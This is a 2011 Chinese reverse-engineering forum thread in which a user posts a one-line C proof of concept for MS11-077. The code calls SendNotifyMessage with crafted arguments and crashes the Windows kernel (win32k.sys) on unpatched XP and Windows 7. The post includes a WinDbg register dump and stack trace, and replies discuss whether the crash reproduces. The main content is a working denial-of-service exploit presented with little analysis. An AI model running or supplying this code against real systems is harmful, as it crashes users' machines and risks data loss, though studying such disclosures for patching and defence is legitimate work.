[原创]MS11-077的一个BSOD代码-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[原创]MS11-077的一个BSOD代码

发表于: 2011-10-19 15:52 12491

[原创]MS11-077的一个BSOD代码

KiDebug

2011-10-19 15:52

12491

/*
* 【作者：KiDebug】
* 【E-Mail：Google￥pku.edu.cn】
*/
#include <Windows.h>

void main()
{
SendNotifyMessage((HWND)-1,0x180,0,0);
}

测试系统：
Windows XP SP3，不安装其他任何安全软件：
WindowsXPprosp3VOL微软原版+正版密钥.iso
user32.dll（5.1.2600.5512）
win32k.sys（5.1.2600.5512，小于5.1.2600.6149的应该都可以）

0: kd> r
eax=0000001d ebx=bf80ee6b ecx=ffffffff edx=bc5d0650 esi=ffffffff edi=ee0a3d64
eip=bf8cfecc esp=ee0a3d08 ebp=ee0a3d08 iopl=0 nv up ei pl nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206
win32k!NtUserfnINLBOXSTRING+0x8:
bf8cfecc 8b4120 mov eax,dword ptr [ecx+20h] ds:0023:0000001f=????????

0: kd> kp
ChildEBP RetAddr
ee0a3d08 bf80eed3 win32k!NtUserfnINLBOXSTRING+0x8
ee0a3d40 8054261c win32k!NtUserMessageCall+0xae
ee0a3d40 7c92e4f4 nt!KiFastCallEntry+0xfc
0012ff3c 77d194be ntdll!KiFastSystemCallRet
0012ff64 00401011 USER32!NtUserMessageCall+0xc
0012ff78 00401148 1!main(void)+0x11 [r:\temp\1\1.cpp @ 6]
0012ffc0 7c817067 1!__tmainCRTStartup(void)+0x10b [f:\dd\vctools\crt_bld\self_x86\crt\src\crt0.c @ 278]
0012fff0 00000000 kernel32!BaseProcessStart+0x23

[课程]FART 脱壳王！加量不加价！FART作者讲授！

收藏・5

免费・6

支持

最新回复 (20)
lylxd 雪币： 4878 活跃值： (3122) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 253 粉丝 1 关注私信	lylxd 2 楼 .......... 2011-10-19 17:06 0
guobing 雪币： 10051 活跃值： (158) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 402 粉丝 0 关注私信	guobing 3 楼 ....伊美儿挺酷的。。。 2011-10-19 17:07 0
猪猡公园雪币： 599 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 269 粉丝 0 关注私信	猪猡公园 4 楼简约而不简单。 2011-10-19 17:50 0
dayang 雪币： 220 活跃值： (701) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 934 粉丝 1 关注私信	dayang 5 楼 KiDebug出品，值得一看！ 2011-10-19 18:39 0
dayang 雪币： 220 活跃值： (701) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 934 粉丝 1 关注私信	dayang 6 楼 XP SP2，NO PATCH，NO BSOD！ 2011-10-19 18:49 0
evilkis 雪币： 596 活跃值： (449) 能力值： ( LV12，RANK：320 ) 在线值：发帖 15 回帖 509 粉丝 8 关注私信	evilkis 7 7 楼 First Blood. 2011-10-19 18:56 0
fxliutm 雪币： 195 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 17 粉丝 0 关注私信	fxliutm 8 楼我试了一下，360弹出警告，并没有BSOD啊。 2011-10-19 19:19 0
vincentzl 雪币： 6 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 37 粉丝 0 关注私信	vincentzl 9 楼楼主能不能解释下参数的意思？ 2011-10-19 20:56 0
KiDebug 雪币： 544 活跃值： (264) 能力值： ( LV12，RANK：210 ) 在线值：发帖 20 回帖 280 粉丝 6 关注私信	KiDebug 4 10 楼我虚拟机里面纯净的XP SP2、SP3、Windows 7 SP1都能蓝。。 2011-10-19 22:47 0
obaby 雪币： 14983 活跃值： (5285) 能力值： ( LV15，RANK：880 ) 在线值：发帖 53 回帖 647 粉丝 81 关注私信	obaby 20 11 楼前来膜拜。膜拜（字数不够，再写一遍） 2011-10-19 23:35 0
MengXP 雪币： 304 活跃值： (507) 能力值： ( LV3，RANK：30 ) 在线值：发帖 15 回帖 136 粉丝 4 关注私信	MengXP 12 楼 xp sp3蓝了.......... 2011-10-20 09:43 0
KiDebug 雪币： 544 活跃值： (264) 能力值： ( LV12，RANK：210 ) 在线值：发帖 20 回帖 280 粉丝 6 关注私信	KiDebug 4 13 楼测试系统： Windows XP SP3，不安装其他任何安全软件： WindowsXPprosp3VOL微软原版+正版密钥.iso user32.dll（5.1.2600.5512） win32k.sys（5.1.2600.5512，5.1.2600.6119） 0: kd> r eax=0000001d ebx=bf80ee6b ecx=ffffffff edx=bc5d0650 esi=ffffffff edi=ee0a3d64 eip=bf8cfecc esp=ee0a3d08 ebp=ee0a3d08 iopl=0 nv up ei pl nz na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206 win32k!NtUserfnINLBOXSTRING+0x8: bf8cfecc 8b4120 mov eax,dword ptr [ecx+20h] ds:0023:0000001f=???????? 0: kd> kp ChildEBP RetAddr ee0a3d08 bf80eed3 win32k!NtUserfnINLBOXSTRING+0x8 ee0a3d40 8054261c win32k!NtUserMessageCall+0xae ee0a3d40 7c92e4f4 nt!KiFastCallEntry+0xfc 0012ff3c 77d194be ntdll!KiFastSystemCallRet 0012ff64 00401011 USER32!NtUserMessageCall+0xc 0012ff78 00401148 1!main(void)+0x11 [r:\temp\1\1.cpp @ 6] 0012ffc0 7c817067 1!__tmainCRTStartup(void)+0x10b [f:\dd\vctools\crt_bld\self_x86\crt\src\crt0.c @ 278] 0012fff0 00000000 kernel32!BaseProcessStart+0x23 2011-10-21 15:26 0
代码疯子雪币： 270 活跃值： (97) 能力值： ( LV8，RANK：140 ) 在线值：发帖 22 回帖 423 粉丝 1 关注私信	代码疯子 3 14 楼不知道这类bug你是如何发现的呢？ 2011-10-21 15:44 0
Vsbat 雪币： 859 活跃值： (304) 能力值： ( LV11，RANK：180 ) 在线值：发帖 9 回帖 273 粉丝 4 关注私信	Vsbat 4 15 楼你又出手了咋不弄个头像... 2011-10-21 15:53 0
KooJiSung 雪币： 357 活跃值： (3133) 能力值： ( LV3，RANK：25 ) 在线值：发帖 8 回帖 682 粉丝 3 关注私信	KooJiSung 16 楼要是可以提权就好了，估计是鸡肋才发出来吧 2011-10-21 16:20 0
nomaster 雪币： 53 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 75 粉丝 0 关注私信	nomaster 17 楼我试试，要是2分钟之内没回帖，那我就是蓝了。。。 2011-10-21 16:26 0
nomaster 雪币： 53 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 75 粉丝 0 关注私信	nomaster 18 楼没蓝，除了360在鬼喊鬼叫，啥事也没有 2011-10-21 16:27 0
KiDebug 雪币： 544 活跃值： (264) 能力值： ( LV12，RANK：210 ) 在线值：发帖 20 回帖 280 粉丝 6 关注私信	KiDebug 4 19 楼补丁比对一下就出来了测试系统： Windows XP SP3，不安装其他任何安全软件： 2011-10-21 16:33 0
caocunt 雪币： 215 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 19 回帖 359 粉丝 0 关注私信	caocunt 20 楼路过看看， 2011-10-24 17:58 0
xnhandt 雪币： 8 活跃值： (10) 能力值： ( LV3，RANK：30 ) 在线值：发帖 4 回帖 17 粉丝 0 关注私信	xnhandt 21 楼 This one may help you: https://community.qualys.com/blogs/securitylabs/2011/12/02/ms11-077-from-patch-to-proof-of-concept 2011-12-15 10:30 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

KiDebug

发帖

280

回帖

210

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (20)
lylxd 雪币： 4878 活跃值： (3122) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 253 粉丝 1 关注私信	lylxd 2 楼 .......... 2011-10-19 17:06 0
guobing 雪币： 10051 活跃值： (158) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 402 粉丝 0 关注私信	guobing 3 楼 ....伊美儿挺酷的。。。 2011-10-19 17:07 0
猪猡公园雪币： 599 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 269 粉丝 0 关注私信	猪猡公园 4 楼简约而不简单。 2011-10-19 17:50 0
dayang 雪币： 220 活跃值： (701) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 934 粉丝 1 关注私信	dayang 5 楼 KiDebug出品，值得一看！ 2011-10-19 18:39 0
dayang 雪币： 220 活跃值： (701) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 934 粉丝 1 关注私信	dayang 6 楼 XP SP2，NO PATCH，NO BSOD！ 2011-10-19 18:49 0
evilkis 雪币： 596 活跃值： (449) 能力值： ( LV12，RANK：320 ) 在线值：发帖 15 回帖 509 粉丝 8 关注私信	evilkis 7 7 楼 First Blood. 2011-10-19 18:56 0
fxliutm 雪币： 195 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 17 粉丝 0 关注私信	fxliutm 8 楼我试了一下，360弹出警告，并没有BSOD啊。 2011-10-19 19:19 0
vincentzl 雪币： 6 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 37 粉丝 0 关注私信	vincentzl 9 楼楼主能不能解释下参数的意思？ 2011-10-19 20:56 0
KiDebug 雪币： 544 活跃值： (264) 能力值： ( LV12，RANK：210 ) 在线值：发帖 20 回帖 280 粉丝 6 关注私信	KiDebug 4 10 楼我虚拟机里面纯净的XP SP2、SP3、Windows 7 SP1都能蓝。。 2011-10-19 22:47 0
obaby 雪币： 14983 活跃值： (5285) 能力值： ( LV15，RANK：880 ) 在线值：发帖 53 回帖 647 粉丝 81 关注私信	obaby 20 11 楼前来膜拜。膜拜（字数不够，再写一遍） 2011-10-19 23:35 0
MengXP 雪币： 304 活跃值： (507) 能力值： ( LV3，RANK：30 ) 在线值：发帖 15 回帖 136 粉丝 4 关注私信	MengXP 12 楼 xp sp3蓝了.......... 2011-10-20 09:43 0
KiDebug 雪币： 544 活跃值： (264) 能力值： ( LV12，RANK：210 ) 在线值：发帖 20 回帖 280 粉丝 6 关注私信	KiDebug 4 13 楼测试系统： Windows XP SP3，不安装其他任何安全软件： WindowsXPprosp3VOL微软原版+正版密钥.iso user32.dll（5.1.2600.5512） win32k.sys（5.1.2600.5512，5.1.2600.6119） 0: kd> r eax=0000001d ebx=bf80ee6b ecx=ffffffff edx=bc5d0650 esi=ffffffff edi=ee0a3d64 eip=bf8cfecc esp=ee0a3d08 ebp=ee0a3d08 iopl=0 nv up ei pl nz na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206 win32k!NtUserfnINLBOXSTRING+0x8: bf8cfecc 8b4120 mov eax,dword ptr [ecx+20h] ds:0023:0000001f=???????? 0: kd> kp ChildEBP RetAddr ee0a3d08 bf80eed3 win32k!NtUserfnINLBOXSTRING+0x8 ee0a3d40 8054261c win32k!NtUserMessageCall+0xae ee0a3d40 7c92e4f4 nt!KiFastCallEntry+0xfc 0012ff3c 77d194be ntdll!KiFastSystemCallRet 0012ff64 00401011 USER32!NtUserMessageCall+0xc 0012ff78 00401148 1!main(void)+0x11 [r:\temp\1\1.cpp @ 6] 0012ffc0 7c817067 1!__tmainCRTStartup(void)+0x10b [f:\dd\vctools\crt_bld\self_x86\crt\src\crt0.c @ 278] 0012fff0 00000000 kernel32!BaseProcessStart+0x23 2011-10-21 15:26 0
代码疯子雪币： 270 活跃值： (97) 能力值： ( LV8，RANK：140 ) 在线值：发帖 22 回帖 423 粉丝 1 关注私信	代码疯子 3 14 楼不知道这类bug你是如何发现的呢？ 2011-10-21 15:44 0
Vsbat 雪币： 859 活跃值： (304) 能力值： ( LV11，RANK：180 ) 在线值：发帖 9 回帖 273 粉丝 4 关注私信	Vsbat 4 15 楼你又出手了咋不弄个头像... 2011-10-21 15:53 0
KooJiSung 雪币： 357 活跃值： (3133) 能力值： ( LV3，RANK：25 ) 在线值：发帖 8 回帖 682 粉丝 3 关注私信	KooJiSung 16 楼要是可以提权就好了，估计是鸡肋才发出来吧 2011-10-21 16:20 0
nomaster 雪币： 53 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 75 粉丝 0 关注私信	nomaster 17 楼我试试，要是2分钟之内没回帖，那我就是蓝了。。。 2011-10-21 16:26 0
nomaster 雪币： 53 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 75 粉丝 0 关注私信	nomaster 18 楼没蓝，除了360在鬼喊鬼叫，啥事也没有 2011-10-21 16:27 0
KiDebug 雪币： 544 活跃值： (264) 能力值： ( LV12，RANK：210 ) 在线值：发帖 20 回帖 280 粉丝 6 关注私信	KiDebug 4 19 楼补丁比对一下就出来了测试系统： Windows XP SP3，不安装其他任何安全软件： 2011-10-21 16:33 0
caocunt 雪币： 215 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 19 回帖 359 粉丝 0 关注私信	caocunt 20 楼路过看看， 2011-10-24 17:58 0
xnhandt 雪币： 8 活跃值： (10) 能力值： ( LV3，RANK：30 ) 在线值：发帖 4 回帖 17 粉丝 0 关注私信	xnhandt 21 楼 This one may help you: https://community.qualys.com/blogs/securitylabs/2011/12/02/ms11-077-from-patch-to-proof-of-concept 2011-12-15 10:30 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复